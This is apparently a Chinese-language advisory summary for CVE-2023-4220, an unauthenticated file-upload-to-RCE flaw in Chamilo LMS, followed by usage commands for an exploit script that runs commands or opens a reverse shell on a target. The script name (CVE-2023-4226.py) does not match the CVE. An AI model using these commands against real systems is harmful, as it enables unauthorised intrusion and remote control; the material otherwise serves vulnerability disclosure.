有关 CVE-2023-4220 的更多信息:StarLabs 安全公告
| 产品 | Chamilo |
|---|---|
| 供应商 | Chamilo |
| 严重性 | 高 - 攻击者可能利用软件漏洞实现未经认证的远程代码执行。 |
| 受影响版本 | <= v1.11.24 |
| 测试版本 | v1.11.24(编写时的最新版本) |
| CVE 标识符 | CVE-2023-4220 |
| CVE 描述 | Chamilo LMS <= v1.11.24 中 /main/inc/lib/javascript/bigupload/inc/bigUpload.php 的大文件上传功能存在不受限制的文件上传漏洞,允许未经认证的攻击者通过上传 Web Shell 执行存储型跨站脚本攻击并获取远程代码执行。 |
| CWE 分类 | CWE-434:对危险类型文件的上传未加限制 |
| CAPEC 分类 | CAPEC-650:向 Web 服务器上传 Web Shell |
要直接执行命令,请使用以下命令:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
要获取反向 Shell,请使用以下命令:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>